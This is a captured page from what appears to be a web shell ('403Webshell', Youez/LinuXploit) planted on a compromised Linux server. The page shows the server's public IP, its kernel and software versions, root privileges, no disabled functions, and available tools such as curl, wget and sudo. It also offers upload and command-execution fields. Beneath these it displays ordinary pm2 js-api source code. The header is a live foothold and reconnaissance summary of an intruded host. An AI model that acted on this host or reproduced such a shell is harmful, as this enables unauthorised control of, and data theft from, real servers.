403Webshell
Server IP : 159.203.156.69  /  Your IP : 216.73.217.22
Web Server : nginx/1.24.0
System : Linux main-ubuntu 6.8.0-71-generic #71-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 16:52:38 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/node_modules/pm2/node_modules/@pm2/js-api/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/node_modules/pm2/node_modules/@pm2/js-api/src/endpoint.js
'use strict'

const RequestValidator = require('./utils/validator')
const debug = require('debug')('kmjs:endpoint')

module.exports = class Endpoint {
  constructor (opts) {
    Object.assign(this, opts)
  }

  build (http) {
    let endpoint = this
    return function () {
      let callsite = new Error().stack.split('\n')[2]
      if (callsite && callsite.length > 0) {
        debug(`Call to '${endpoint.route.name}' from ${callsite.replace('    at ', '')}`)
      }
      return new Promise((resolve, reject) => {
        RequestValidator.extract(endpoint, Array.prototype.slice.call(arguments))
          .then((opts) => {
            // Different service than default, setup base url in url
            if (endpoint.service && endpoint.service.baseURL) {
              let base = endpoint.service.baseURL
              base = base[base.length - 1] === '/' ? base.substr(0, base.length - 1) : base
              opts.url = base + opts.url
            }
            http.request(opts).then(resolve, reject)
          })
          .catch(reject)
      })
    }
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit